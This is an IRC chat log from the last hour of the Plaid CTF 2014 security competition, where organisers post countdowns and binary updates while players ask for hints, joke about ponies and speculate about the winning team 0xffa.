  9421. (14:51:55) (clockish) tylerni7: up with the proletariat
  9422. (14:52:02) (poppopret) why does tomcr00se not write writeups?
  9423. (14:52:08) (inter) cuz he has swag
  9424. (14:52:10) (+tylerni7) poppopret: he wants to keep hacking elite
  9425. (14:52:14) (+mserrano) efn
  9426. (14:52:15) (+tylerni7) poppopret: also he's kind of a dick
  9427. (14:52:16) (+mserrano) efb*
  9428. (14:52:21) (+tylerni7) tomcr00se: <3
  9429. (14:52:29) ••• mOde: (ChanServ) sets (+o cai_)
  9430. (14:52:39) (+mserrano) 70min to go
  9431. (14:52:46) ••• tOpic: (cai_) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 1 Hour left | $40 added to each cash prizes so far (from CHANCE card))
  9432. (14:52:51) (+mserrano) 67*
  9433. (14:52:55) ••• mOde: (ChanServ) sets (-o cai_)
  9434. (14:53:00) (+mserrano) go go go 0xffa/ds/mslc/etc
  9435. (14:53:09) (+mserrano) WHO WILL WIN THE ULTIMATE SHOWDOWN OF ULTIMATE HACKERY
  9436. (14:53:18) (clockish) tylerni7: note that we're not exactly great about writeups, either...
  9437. (14:53:29) (+ricky) Hey when we're required to, we write them
  9438. (14:53:52) (+cai_) we will turn off the scoreboard for the last hour
  9439. (14:54:09) (+cai_) j/k
  9440. (14:54:38) (+ricky) Half the room was about to turn around and yell at cai_
  9441. (14:54:42) (tokki) lol
  9442. (14:54:52) (+ricky) (The room we're sitting in)
  9443. (14:54:58) (+mserrano) naw we shoulda turned it off like 8 hours before the end
  9444. (14:55:01) (tokki) lool
  9445. (14:55:02) (+mserrano) codegate style
  9446. (14:55:21) ([CISSP]HoLyVieR) for the polygon challenge, was there anything posted about the dictionnary we have to brute-force with ? Or just any dictionnary should do ?
  9447. (14:55:21) (sven) pf, it's way more exciting this way :)
  9448. (14:55:30) (+mserrano) [CISSP]HoLyVieR: wat
  9449. (14:55:54) (+ricky) So PPP doesn't do stupid password brute forcing challenges
  9450. (14:56:04) (+ricky) Unless it's a crypto thing where the brute force is reasonable
  9451. (14:56:12) (clockish) and local
  9452. (14:56:13) (+ricky) Please note this for the future :-)
  9453. (14:56:15) (tokki) lol
  9454. (14:56:19) ([CISSP]HoLyVieR) "They claim bots can no longer attack the website protected by the Polygon Shifter. Do we need to manually bruteforce the credentials?"
  9455. (14:56:23) ([CISSP]HoLyVieR) that's in the description
  9456. (14:56:36) (+mserrano) [CISSP]HoLyVieR: if the question ever mentions manual bruteforcng
  9457. (14:56:42) (+ricky) OK, that's kind of just part of the whole making fun of shapesecurity
  9458. (14:56:42) (+mserrano) the answer is not manual bruteforcing
  9459. (14:56:48) (+mserrano) when's the last time you manually bruteforced something
  9460. (14:56:52) (+mserrano) and enjoyed it
  9461. (14:56:54) (+ricky) Like it's supposed to be sarcastic
  9462. (14:56:58) ([CISSP]HoLyVieR) I'm not manually brute-forcing it
  9463. (14:57:00) (oceanx) lol
  9464. (14:57:16) (+mserrano) bruteforce is not the answer
  9465. (14:57:26) (sven) it's a start, though
  9466. (14:57:31) (+mserrano) not a good one
  9467. (14:57:34) ••• qUit: (HeartLESS_) (2e000ac9@gateway/web/freenode/ip.46.0.10.201) Quit: Page closed
  9468. (14:57:39) (sven) never claimed that :)
  9469. (14:57:52) (foundation) say no to manual bruteforcee!
  9470. (14:57:53) (tokki) i just had 30mins of manual bruteforcing lol
  9471. (14:58:06) (Adran) tokki: did that work?
  9472. (14:58:10) (sven) use automated bruteforce instead. more fun for everyone!
  9473. (14:58:15) (positron_) how to solve kpop without file write
  9474. (14:58:17) (tokki) :D YES
  9475. (14:58:32) (Adran) tokki: *.*
  9476. (14:58:33) (tokki) positron_: listen to kpops..?
  9477. (14:58:34) (Adran) ugh
  9478. (14:58:38) (tokki) *.*
  9479. (14:58:41) ••• qUit: (LouTerrailloune) ([email protected]) Quit: Nettalk6 - www.ntalk.de
  9480. (14:58:49) ••• jOin: (opxx) (5b79cbc3@gateway/web/freenode/ip.91.121.203.195)
  9481. (14:59:02) (opxx) how much time left?
  9482. (14:59:05) (tokki) 1HR
  9483. (14:59:08) (tokki) 111111
  9484. (14:59:12) (opxx) damn
  9485. (14:59:25) (tokki) ikr
  9486. (14:59:32) ••• qUit: (Hero2Day) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88) Excess Flood
  9487. (14:59:36) (opxx) stil no idwa about that js-web... this one + web800 are the hardest one
  9488. (14:59:47) ••• jOin: (nope_) (81f49032@gateway/web/freenode/ip.129.244.144.50)
  9489. (14:59:54) (opxx) *idea
  9490. (14:59:57) (tokki) GOOD LUCK GUYS FOR THE LAST HOUR
  9491. (15:00:05) (+ricky) web800 is quality enterprise web
  9492. (15:00:14) (sven) for some value of quality
  9493. (15:00:21) ••• jOin: (Hero2Morow) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88)
  9494. (15:00:27) (opxx) what do u mean by that?
  9495. (15:00:34) (sven) nothing.
  9496. (15:00:53) ••• jOin: (batzig) ([email protected])
  9497. (15:01:06) (+ricky) I think 0xffa is about to solve part
  9498. (15:01:07) (+ricky) 2
  9499. (15:01:07) (ius) ricky: its not written in java is it
  9500. (15:01:10) ••• qUit: (Reset__) (79b22486@gateway/web/freenode/ip.121.178.36.134) Quit: Page closed
  9501. (15:01:13) (+ricky) Super super close :-)
  9502. (15:01:14) ••• qUit: (nope_) (81f49032@gateway/web/freenode/ip.129.244.144.50) Client Quit
  9503. (15:01:19) ••• qUit: (scnarc) ([email protected]) Quit: leaving
  9504. (15:01:29) (Adran) ricky: i'm presuming you're monitoring the stuff? :P
  9505. (15:01:36) (+ricky) :-)
  9506. (15:01:36) (+cai_) Adran: he is :)
  9507. (15:01:54) (Adran) fun
  9508. (15:02:03) ••• jOin: (comex) ([email protected])
  9509. (15:02:15) (+ricky) Anyway, I suspect it's gg after you get that
  9510. (15:02:16) (tokki) ftw!
  9511. (15:02:19) (+ricky) Nicely done
  9512. (15:02:26) ••• jOin: (deject3d_) ([email protected])
  9513. (15:02:34) (+tylerni7) nicely *almost* done
  9514. (15:02:35) (+tylerni7) :P
  9515. (15:02:41) (+ricky) I'm sure it's coming any second now
  9516. (15:02:46) (+tylerni7) that's what she said
  9517. (15:02:53) (mathiasbynens) :D
  9518. (15:02:53) (+mserrano) :D
  9519. (15:02:54) (+ricky) :-(
  9520. (15:03:01) ••• jOin: (sdjakl) ([email protected])
  9521. (15:03:20) (tokki) :D lol
  9522. (15:04:11) ••• qUit: (deject3d) ([email protected]) Ping timeout: 240 seconds
  9523. (15:05:26) (inter) dude
  9524. (15:05:29) (inter) i
  9525. (15:05:36) (inter) i cant
  9526. (15:05:42) (inter) handle the ponies anymore
  9527. (15:06:03) (qll) xD
  9528. (15:06:15) (+ricky) Heheh
  9529. (15:07:52) ••• jOin: (batzig_) ([email protected])
  9530. (15:08:31) (batzig_) for crypto 200 (graphs) does the decrypted number need to be converted to a string to be submitted?
  9531. (15:08:31) (tokki) my friend's saying he is getting high on ponies
  9532. (15:08:36) (+tylerni7) batzig_: yes
  9533. (15:09:08) (WuZ) I have a question for "rendez-vous", which admin can I pm?
  9534. (15:09:11) (opxx) any hint for halphow2js will be released?
  9535. (15:09:19) (+mserrano) 50min
  9536. (15:09:30) (iZsh) i'm about to have a heartattack
  9537. (15:09:34) (tokki) they're gonna release hints like
  9538. (15:09:34) • sven too
  9539. (15:09:41) (tokki) in the last 30 seconds
  9540. (15:09:50) (opxx) ^^
  9541. (15:09:53) (+mserrano) lol
  9542. (15:10:01) • sven can't take the suspense anymore :<
  9543. (15:10:03) (+mserrano) iZsh / sven: don't die
  9544. (15:10:16) (+tylerni7) at least not until you solve bronies
  9545. (15:10:26) (tokki) brownies!
  9546. (15:11:15) ••• jOin: (hammerpig) (~user@gateway/tor-sasl/hammerpig)
  9547. (15:11:27) ••• qUit: (opxx) (5b79cbc3@gateway/web/freenode/ip.91.121.203.195) Quit: Page closed
  9548. (15:11:30) ••• jOin: (Beched) (6daa088b@gateway/web/freenode/ip.109.170.8.139)
  9549. (15:11:39) (poppopret) is the polygon challenge supposed to be easy?
  9550. (15:11:47) (+tylerni7) fairly easy
  9551. (15:11:48) ••• qUit: (sigsegv_) (7ab35ee7@gateway/web/freenode/ip.122.179.94.231) Quit: Page closed
  9552. (15:11:50) (+tylerni7) still 100 points though
  9553. (15:11:54) ••• jOin: (snoopybbt) ([email protected])
  9554. (15:12:24) (deject3d_) for web100, we can assume the password length is what the page says right
  9555. (15:12:40) (dwn) I want to know how long hudak took mslc/dragon/etc.
  9556. (15:12:44) (dwn) because apparently I am really bad
  9557. (15:12:50) (Pitr_) Can someone explain the last step I'm missing in curlcore, in 1 hour? :)
  9558. (15:12:51) (poppopret) it's giving me an aneurysm
  9559. (15:12:56) (dwn) yea.
  9560. (15:13:01) (dwn) i mean it's fun
  9561. (15:13:03) (tokki) hudak means fast(?) in korean
  9562. (15:13:05) (+tylerni7) Pitr_: you can pm me... but I may not be able to help
  9563. (15:13:06) (dwn) but i am gonna take forever
  9564. (15:13:24) (factoreal) who solve web_200 reekee?
  9565. (15:13:38) (+tylerni7) factoreal: you can pm me specific questions about it
  9566. (15:13:53) (Hero2Morow) is parlor down?
  9567. (15:13:58) (+tylerni7) Hero2Morow: will check
  9568. (15:14:05) (+tylerni7) Hero2Morow: no
  9569. (15:14:55) (NK_) tylerni7: are you guys coming to phdays this year ?
  9570. (15:15:06) (+tylerni7) NK_: I think a few of us are...
  9571. (15:15:24) (positron_) gimme hints for kpop
  9572. (15:15:42) (Hero2Morow) cookie
  9573. (15:15:46) (Hero2Morow) jk i have no clue
  9574. (15:15:53) (Hero2Morow) jk i have no clue:(
  9575. (15:15:56) ••• pArt: (shuckens) ([email protected])
  9576. (15:16:01) (Hero2Morow) ive bene trying to tolve it for 2 days :(
  9577. (15:16:04) ••• jOin: (muchacho) ([email protected])
  9578. (15:16:07) (sven) hints are for the weak
  9579. (15:16:17) (tokki) lol if in any quals someone comes up and asks you for an autograph
  9580. (15:16:20) (tokki) that'll be me
  9581. (15:16:37) (+mserrano) < 45 minutes
  9582. (15:16:43) ••• jOin: (pcc7) (c0518434@gateway/web/freenode/ip.192.81.132.52)
  9583. (15:16:46) (sven) fuckfuckfuck
  9584. (15:16:48) (tokki) *gasp*
  9585. (15:17:00) (+houqp_) gogogogogo
  9586. (15:17:03) (architekt) gogoogo
  9587. (15:17:17) (+houqp_) geobot: gogogogogo
  9588. (15:17:17) (tokki) gogogogog
  9589. (15:17:20) (+tylerni7) dragon sector! you still have time!
  9590. (15:17:29) (Hero2Morow) gooooooooooooooooooo
  9591. (15:17:37) (tokki) EVERYONE FTW
  9592. (15:17:56) (inter) what if i told you the real winner is tylerni7
  9593. (15:18:02) (+tylerni7) you would be wrong
  9594. (15:18:06) (halfvollemelk) gogogogogo GUYS!
  9595. (15:18:07) (inter) he spread the bronies around
  9596. (15:18:10) (inter) infecting normal people
  9597. (15:18:18) (+ricky) So cloes so close :-)
  9598. (15:18:37) (Hero2Morow) DRAGON SECTOR JUST GOT POINTS
  9599. (15:18:40) (Hero2Morow) DAYYYUUUU,
  9600. (15:18:41) (Hero2Morow) M
  9601. (15:18:46) (tokki) DAYUMMMMMN
  9602. (15:18:47) (acez) anyone here for 'jackshit' challenge ?
  9603. (15:18:47) (Pitr_) thanks tylerni7, I've got one more thing to try
  9604. (15:18:50) (+ricky) Uh oh
  9605. (15:18:51) (+tylerni7) ok
  9606. (15:19:00) (+mserrano) Hero2Morow: u wot m8
  9607. (15:19:02) (acez) tylerni7: 'jackshit' challenge admin around ?
  9608. (15:19:07) (+mserrano) acez: ping clockish
  9609. (15:19:12) (acez) thanks
  9610. (15:19:17) (clockish) yeah me
  9611. (15:19:39) (tokki) fuck my itunes just came on
  9612. (15:19:43) (tokki) and scared the shit out of me
  9613. (15:20:34) ••• qUit: (batzig_) ([email protected]) Quit: My MacBook Pro has gone to sleep. ZZZzzz…
  9614. (15:20:34) ••• qUit: (batzig) ([email protected]) Remote host closed the connection
  9615. (15:20:43) (+mserrano) < 40
  9616. (15:21:14) (halfvollemelk) gotta go, great CTF! thanks guys
  9617. (15:21:21) (Hero2Morow) you could fuck with people so hard
  9618. (15:21:21) (+mserrano) everybody
  9619. (15:21:24) (+tylerni7) halfvollemelk: thanks for playing!
  9620. (15:21:25) (+mserrano) ricky's favorite pony
  9621. (15:21:28) (+mserrano) is Princess Celestia
  9622. (15:21:30) (Hero2Morow) by solving a good amount fo the problems
  9623. (15:21:33) (tokki) ooh
  9624. (15:21:38) (Hero2Morow) but saving the flags for the last 20 minuteds
  9625. (15:21:43) (+tylerni7) Hero2Morow: yeahh...
  9626. (15:21:43) ••• qUit: (halfvollemelk) (589f763c@gateway/web/freenode/ip.88.159.118.60) Quit: Page closed
  9627. (15:21:43) (Hero2Morow) and just jump to the top
  9628. (15:21:48) (+tylerni7) that's called "being a dick"
  9629. (15:21:58) (acez) btw the ctf ends in 40 minutes ?
  9630. (15:22:04) (+tylerni7) acez: 38
  9631. (15:22:05) (+tylerni7) but yeah
  9632. (15:22:08) (+tylerni7) (as in, on time)
  9633. (15:22:14) (acez) k thanks
  9634. (15:22:42) (Sin__) what did you guys do since the start to make the website more responsive ?
  9635. (15:22:42) (geobot) hadn't been responsive
  9636. (15:22:52) (tomcr00se) i think i'm too tired for jackshit
  9637. (15:22:56) (+tylerni7) Sin__: awesie has a writeup about the site
  9638. (15:23:12) (Sin__) okay, cool
  9639. (15:23:16) (+tylerni7) it'll get posted after the ctf
  9640. (15:23:19) (tomcr00se) all looks like best quality code to me
  9641. (15:23:24) (+mserrano) tomcr00se: jackshit may be broken
  9642. (15:23:28) (+ricky) tomcr00se: I think 0xffa solved bronies 2 in about 2 hours or less - you can do it in 30 min, right?
  9643. (15:23:36) (+mserrano) we are checking
  9644. (15:23:40) (acez) thanks
  9645. (15:23:44) (+ricky) Solved meaning got super super cloes
  9646. (15:23:45) (+tylerni7) mserrano: it's /probably not/ broken
  9647. (15:23:48) (+tylerni7) but it might be
  9648. (15:24:20) (tomcr00se) mserrano: OMG THATS JACKSHIT
  9649. (15:24:29) (+ricky) Hahaha
  9650. (15:24:43) (tomcr00se) i work so hard
  9651. (15:24:56) (tomcr00se) think i deserve hint for _nightmare_
  9652. (15:24:57) (+ricky) Oh maybe more like 3 hours, not sure
  9653. (15:24:58) (ciliated) where the flag is in reekee
  9654. (15:25:00) (+ricky) Anyway :-)
  9655. (15:25:13) (+ricky) The flag is reekee is in a file somewhere I believe
  9656. (15:25:16) (tokki) tomcr00se: they're gonna give the hint 30 seconds before the ctf ends
  9657. (15:25:29) (oceanx) tomcr00se: everyone deserves a hint for _nightmare_ :P
  9658. (15:25:30) (geobot) skier_ did you get a hint for _nightmare_
  9659. (15:25:52) (vladum_) quick question about reekee, please?
  9660. (15:26:03) (+ricky) vladum_: pm tylerni7
  9661. (15:26:06) (ciliated) +ricky: at which directory?
  9662. (15:26:18) (+ricky) ciliated: Not sure what directory, you don't need to know to solve it
  9663. (15:26:20) ••• jOin: (erketu) ([email protected])
  9664. (15:26:22) ••• qUit: (rvpersie) ([email protected]) Remote host closed the connection
  9665. (15:26:24) (sdjakl) geobot: ffa hasn't gotten any hints
  9666. (15:26:25) (geobot) he kinda surprised it hasn't really appreciate your sentiment
  9667. (15:26:32) • tokki looks at clock looks at clock looks at clock throws clock
  9668. (15:27:59) (poppopret) is web150 considered easy or hard?
  9669. (15:27:59) (geobot) what 8 ctfs offer the most realistic data fetch and not a brony, fwiw, i think some of you sobs do you ball so hard?
  9670. (15:28:02) ••• qUit: (phiber__) ([email protected]) Read error: Connection reset by peer
  9671. (15:28:16) ••• jOin: (phiber__) ([email protected])
  9672. (15:28:19) (comex) geobot: i'm a brony
  9673. (15:28:37) (+tylerni7) geobot: did you like the site?
  9674. (15:28:39) (+tylerni7) er
  9675. (15:28:41) (+tylerni7) comex: *
  9676. (15:28:46) (+ricky) Did you know all the captchas from memor?
  9677. (15:28:52) (comex) tylerni7: i was asleep for the actual brony part though :(
  9678. (15:28:55) (+tylerni7) aww
  9679. (15:29:00) (+tylerni7) that makes me sad
  9680. (15:29:20) • +ricky whistles
  9681. (15:29:27) ••• mOde: (ChanServ) sets (+o mserrano)
  9682. (15:29:33) (comex) i like the fading colors though
  9683. (15:29:44) ••• tOpic: (mserrano) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 30 minutes left | $40 added to each cash prizes so far (from CHANCE card))
  9684. (15:29:47) ••• mOde: (mserrano) sets (-o mserrano)
  9685. (15:29:50) (+tylerni7) comex: yeah, top notch web skillz
  9686. (15:29:50) (geobot) all 8 users around but nothing that i put into how teams are your skillz at cracking sql dump seem to work with: ctf though -_-
  9687. (15:29:57) (ryan-c) yay, got parlor
  9688. (15:30:11) ••• qUit: (cool_guy) ([email protected]) Ping timeout: 240 seconds
  9689. (15:30:28) (sdjakl) tylerni7: I swear, the things you made me go through for reekee
  9690. (15:30:35) (clockish) jackshit updated to remove the stack protector
  9691. (15:30:40) ••• qUit: (Tokage-Kira) (uid15875@gateway/web/irccloud.com/x-adqrbntyqeceebtc) Quit: Connection closed for inactivity
  9692. (15:30:42) (sdjakl) tylerni7: (speaking of web skills)
  9693. (15:31:03) (+dickoff) ANNOUNCE: ---------------- jackshit updated to remove the stack protector --------------------------------
  9694. (15:31:06) (Beched) huh
  9695. (15:31:20) (Beched) btw rather nice ctf, i thought it will be worse
  9696. (15:31:24) (iZsh) meh
  9697. (15:31:27) (Beched) i mean ppp never makes bad tasks
  9698. (15:31:28) (zoku) ricky: could you installs trace on the nightmare box?
  9699. (15:31:28) (ius) ricky: reporting in for knowing some PONIES by heart by now
  9700. (15:31:29) (+tylerni7) sdjakl: :)
  9701. (15:31:31) (+tylerni7) Beched: haha
  9702. (15:31:33) (Beched) but they make only PWN
  9703. (15:31:35) (iZsh) why do you guys change the binary 30min before the end?
  9704. (15:31:41) (Beched) and now there're various categories
  9705. (15:31:42) (+tylerni7) iZsh: because we fucked it up
  9706. (15:31:42) (zoku) ricky: trying to debug my ezhp exploit
  9707. (15:31:50) (+ricky) Congrats 0xfaa for solving Bronies 2!
  9708. (15:31:51) (Beched) but lol even in web there's pwn xD
  9709. (15:31:51) (geobot) we should make only pwn a setuid binary so ida
  9710. (15:31:54) (+cai_) Grats :)
  9711. (15:31:55) (+ricky) Nicely done!
  9712. (15:31:55) (iZsh) yeah but we worked with that :s
  9713. (15:31:56) (_blasty_) b0w d0wn
  9714. (15:31:57) (_blasty_) BOW DOWN
  9715. (15:31:58) (+mserrano) 0xffa: gg :D
  9716. (15:31:59) (+ricky) Good game
  9717. (15:32:00) (+tylerni7) :O
  9718. (15:32:04) ••• jOin: (yyyyyyy) ([email protected])
  9719. (15:32:05) (tokki) I L PolygonShifter
  9720. (15:32:09) (+mserrano) (for that problem anyway)
  9721. (15:32:12) (tokki) <3
  9722. (15:32:16) (+ricky) Sorry for that horrible C++
  9723. (15:32:27) (+tylerni7) dragon sector! better finish up bronies!
  9724. (15:32:40) (+tylerni7) :O
  9725. (15:32:47) (hellman_) gg
  9726. (15:32:49) (iZsh) meh, i was working on jackshit :s
  9727. (15:32:51) (wtbw) chronosphere due to discharge after the game is over
  9728. (15:32:55) (+tylerni7) iZsh: it's basically the same
  9729. (15:33:00) ••• pArt: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796) "WeeChat 0.4.1"
  9730. (15:33:00) (+mserrano) iZsh: the problem is the same, just no stack protector
  9731. (15:33:05) (Beched) иец
  9732. (15:33:07) (Beched) btw
  9733. (15:33:12) (ryan-c) who the hell is 0xffa?
  9734. (15:33:13) (Beched) who are 0xffa ? O_O
  9735. (15:33:15) (Beched) lol
  9736. (15:33:16) (tokki) ㅣㅐㅣ
  9737. (15:33:17) (tokki) lol
  9738. (15:33:18) (ryan-c) lol
  9739. (15:33:21) (+tylerni7) heh
  9740. (15:33:22) (zoku) ricky: any other suggestions?
  9741. (15:33:24) (ius) do the maths
  9742. (15:33:27) (ius) it'll check out
  9743. (15:33:30) (+frozencemetery) have you ever really looked at your hands?
  9744. (15:33:30) (zoku) ricky: I'm having a hell of a time debugging over a connectback shell with no tools
  9745. (15:33:31) (ryan-c) tylerni7: parlor was fun, thanks :D
  9746. (15:33:32) (+tylerni7) :P
  9747. (15:33:40) (+tylerni7) ryan-c: glad you enjoyed it :)
  9748. (15:33:56) (+tylerni7) ius: but.. addition is hard
  9749. (15:33:59) (+tylerni7) much like multiplication
  9750. (15:34:04) (foundation) no eindbazen this year? i guess they must have forgotten their password ?
  9751. (15:34:08) ••• qUit: (eZpl0it) ([email protected]) Ping timeout: 252 seconds
  9752. (15:34:08) (tokki) lol
  9753. (15:34:16) (+mserrano) no way
  9754. (15:34:17) (sdjakl) 0xffa = x+y for x,y (in) Z
  9755. (15:34:18) (Beched) heh
  9756. (15:34:20) (+mserrano) we email it to them in plaintext
  9757. (15:34:24) (tokki) lol
  9758. (15:34:27) (Beched) yeah btw, Eindbazen have gone
  9759. (15:34:43) (Beched) hm
  9760. (15:34:59) ••• jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
  9761. (15:35:01) (ius) x + y = 0xffa, solve for x,y indeed ;)
  9762. (15:35:19) ••• jOin: (random_user_23) (5d6846fd@gateway/web/freenode/ip.93.104.70.253)
  9763. (15:35:25) (+ricky) zoku: I think clockish is installing it now
  9764. (15:35:29) (ryan-c) tylerni7: is the ctf ending on time, or being extended an hour or two?
  9765. (15:35:32) (clockish) yeah, I'll do it
  9766. (15:35:35) (+tylerni7) ryan-c: ending on time
  9767. (15:35:39) (+dickoff) ryan-c: it is ending in 25 minutes
  9768. (15:35:40) (+tylerni7) as we have been saying :P
  9769. (15:35:46) (+tylerni7) it's a 48 hour competition
  9770. (15:35:52) (+tylerni7) you've all had plenty of time :)
  9771. (15:35:55) (clockish) zoku: anything else you want?
  9772. (15:35:55) (wtbw) frozencemetery: woah, I have *fingers*
  9773. (15:35:56) (Beched) ius
  9774. (15:36:03) (Beched) i remember you're from eindbazen, aren't you?
  9775. (15:36:13) (Beched) 0xffa == Eindbazen ??? O__O
  9776. (15:36:18) (+tylerni7) + ...
  9777. (15:36:21) (+mserrano) O__O
  9778. (15:36:22) (tokki) O__O
  9779. (15:36:25) (+tylerni7) 0xffa > 0xeb
  9780. (15:36:27) (mathiasbynens) mind = blown
  9781. (15:36:29) (sdjakl) yeah tylerni7 seems to have gotten it
  9782. (15:36:30) (+frozencemetery) wtbw: weeeeeiiiiiiirdddd
  9783. (15:36:31) (dkohlbre) | (•□•) |
  9784. (15:36:50) (zoku) nah clockish, gdb is already installed but I can't use it over connectback anyways >_<
  9785. (15:36:53) (zoku) lol
  9786. (15:36:56) (ius) tylerni7: close ;)
  9787. (15:37:02) (tokki) lol
  9788. (15:37:07) (+tylerni7) ius: I know, I don't wanna give it away though :P
  9789. (15:37:14) (ius) :D
  9790. (15:37:29) (sven) it's not that hard anymore now :P
  9791. (15:37:36) ••• qUit: (c0ax) ([email protected]) Quit: Leaving
  9792. (15:37:39) (+ricky) zoku: Sorry, I was mistaken, apparently the machine is different from ezhp so things might be different
  9793. (15:37:46) (Gynvael) wtf chacning the jackshit binary --;
  9794. (15:37:57) (+mserrano) Gynvael: it's the same, but no stack protector =\
  9795. (15:37:58) (+ricky) Not sure what to suggest other than getting a similar env setup or staring more to figure out why your addresses aren't matching up
  9796. (15:37:58) (_blasty_) holy fuck my heart is pounding through my chest
  9797. (15:38:04) (Gynvael) comeone, we had the exploit almost working
  9798. (15:38:06) (+ricky) Hehe yeah, that was tight timing
  9799. (15:38:11) (+ricky) Gynvael: You still have time!
  9800. (15:38:13) (Gynvael) and now the layout of stack changed ;/
  9801. (15:38:16) (+ricky) Oh jackshit, never mind
  9802. (15:38:20) (zoku) yea, I've tried on debian and ubuntu ricky ;/
  9803. (15:38:21) (+mserrano) Gynvael: pm clockish
  9804. (15:38:24) (+ricky) Ah, sorry - we're starting a copy of the old one up I think
  9805. (15:38:34) (clockish) Gynvael: sorry! I'll get the old one back up
  9806. (15:38:40) (+tylerni7) new one should be strictly easier, but...
  9807. (15:38:46) ••• pArt: (handlr) (~handlr@unaffiliated/handlr)
  9808. (15:39:19) ••• mOde: (ChanServ) sets (+o mserrano)
  9809. (15:39:29) ••• tOpic: (mserrano) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 20 minutes left | $40 added to each cash prizes so far (from CHANCE card))
  9810. (15:39:33) ••• mOde: (mserrano) sets (-o mserrano)
  9811. (15:39:36) (nopple) lol i was also right at the point where it might have hurt more than helped on it, but i started going forward with new version already...
  9812. (15:39:37) (geobot) just hurt firefox os's feelings on default ubuntu think yeah crowell you're going to be nice to be awesome
  9813. (15:39:50) (Beched) geobot != tomcr00se ?
  9814. (15:39:58) (+tylerni7) lol
  9815. (15:40:35) ••• qUit: (hellman) ([email protected]) Quit: Segmentation Fault
  9816. (15:40:36) ••• qUit: (hellman_) ([email protected]) Quit: Segmentation Fault
  9817. (15:40:46) (tokki) lol
  9818. (15:40:48) (ryan-c) lol
  9819. (15:40:49) ••• jOin: (hellman) ([email protected])
  9820. (15:40:57) (ryan-c) hellman: WHAT DID YOU DO
  9821. (15:41:28) (tokki) lol
  9822. (15:41:39) ••• jOin: (shabgard) (~mostafa@unaffiliated/shabgard)
  9823. (15:41:51) (iZsh) you guys still haven't figured out what 0xffa is? ;-)
  9824. (15:41:52) (ciliated) reekee is not directory traversal?
  9825. (15:42:03) (+houqp_) Beched: you need to ask geobot
  9826. (15:42:04) (sven) it's really not hard :P
  9827. (15:42:06) (+tylerni7) ciliated: you can pm me
  9828. (15:42:07) (_blasty_) Who will solve the 0xFFA puzzle first ?
  9829. (15:42:18) (iZsh) yeah 0xffa is a CTF chall :)
  9830. (15:42:20) (_blasty_) :-)
  9831. (15:42:20) (arthurdent) it's a xor of two teams
  9832. (15:42:23) (sven) nope
  9833. (15:42:25) (+mserrano) some of us have already "solved"
  9834. (15:42:27) (+mserrano) :P
  9835. (15:42:27) (_blasty_) warm.
  9836. (15:42:30) (sven) close though.
  9837. (15:42:47) ••• jOin: (paul_axe) ([email protected])
  9838. (15:42:51) ••• qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Quit: leaving
  9839. (15:42:54) (paul_axe) hi, who can i ask about kpop?
  9840. (15:42:57) (AnthraX101) XOR? Like those who were in both before were not allowed in?
  9841. (15:42:57) (geobot) it did do it in?
  9842. (15:43:00) (+tylerni7) paul_axe: mserrano
  9843. (15:43:00) (+mserrano) paul_axe: me
  9844. (15:43:01) (sven) [22:34:59] <sdjakl> 0xffa = x+y for x,y (in) Z
  9845. (15:43:07) (sven) now find x and y!
  9846. (15:43:13) (Beched) paul_axe: O_O ты за кого?)
  9847. (15:43:17) (sdjakl) if its clearer I can use latex notation
  9848. (15:43:23) (_blasty_) :-)
  9849. (15:43:32) (paul_axe) Beched: solo ;)
  9850. (15:43:40) (Beched) =)
  9851. (15:43:48) (sven) another hint: sdjakl is part of 0xffa
  9852. (15:43:54) (+tylerni7) Beched: english plz
  9853. (15:44:01) (plaintext) it's gg for us I guess
  9854. (15:44:06) (+dickoff) but I hear addition is hard, how will I ever solve for x and y?
  9855. (15:44:15) (zoku) clockish: is nightmare NATed?
  9856. (15:44:16) (iZsh) dickoff: :)
  9857. (15:44:28) ••• jOin: (DuM) ([email protected])
  9858. (15:44:36) (+mserrano) <= 15 minutes
  9859. (15:44:40) (inter) zoku: no its under alcatraz
  9860. (15:44:52) (zoku) fuck
  9861. (15:44:57) ••• jOin: (gijs) ([email protected])
  9862. (15:45:01) (poppopret) do ppl score points often in the last couple of minutes?
  9863. (15:45:02) ••• qUit: (Im11Plus) ([email protected]) Remote host closed the connection
  9864. (15:45:17) ••• jOin: (khloe_k) ([email protected])
  9865. (15:45:21) ••• qUit: (Sin__) ([email protected]) Quit: Sin__
  9866. (15:45:36) (iZsh) poppopret: when you're #1, murphy says yes
  9867. (15:45:46) (iZsh) when you're #2, murphy says no
  9868. (15:45:49) (plaintext) multiplication hint plox :P
  9869. (15:45:54) (sven) yeah, 1 second before the end ofc
  9870. (15:45:59) (+tylerni7) iZsh: or still says yes, and you move down to 3rd :(
  9871. (15:46:06) (zoku) what system is ezhp running on??
  9872. (15:46:12) (zoku) 32bit debian??
  9873. (15:46:13) (iZsh) tylerni7: heh yeah, i didn't think of this way ;-)
  9874. (15:46:17) (poppopret) OS X
  9875. (15:46:24) (hellman) Thx ppp for cool ctf (and teams), i think i'm off now :) gg
  9876. (15:46:31) (+mserrano) :) see ya hellman
  9877. (15:46:33) (+tylerni7) hellman: o/
  9878. (15:46:35) (corpille) any lasts minute hint on mtpox ?
  9879. (15:46:39) (+dickoff) hellman: o/
  9880. (15:46:46) (clockish) Gynvael: it's up at 1283
  9881. (15:46:57) (clockish) Gynvael: the port patch is the only difference
  9882. (15:47:00) (Adran) any chance web100 might be usable until the end? :(
  9883. (15:47:00) (Gynvael) thx
  9884. (15:47:02) (tokki) k lets chat i think i'm ready for the write ups
  9885. (15:47:05) (zoku) clockish: do you admin the ezhp box too??
  9886. (15:47:05) (clockish) Gynvael: super sorry
  9887. (15:47:10) (clockish) zoku: no
  9888. (15:47:30) (tokki) we're still stuck on crypto 20 ;)
  9889. (15:47:30) (geobot) and 20 minuteds
  9890. (15:47:36) (+ricky) 12 minutes left!
  9891. (15:47:44) (rray) geobot: hi
  9892. (15:48:05) (_blasty_) np: Jace Hall - LOL MONEY
  9893. (15:48:18) (sven) :>
  9894. (15:48:22) ••• jOin: (Hertle) ([email protected])
  9895. (15:48:33) (Adran) ricky: poor web100, everyone seems to be just hammering it right now
  9896. (15:48:33) (geobot) for web100, we can some other people
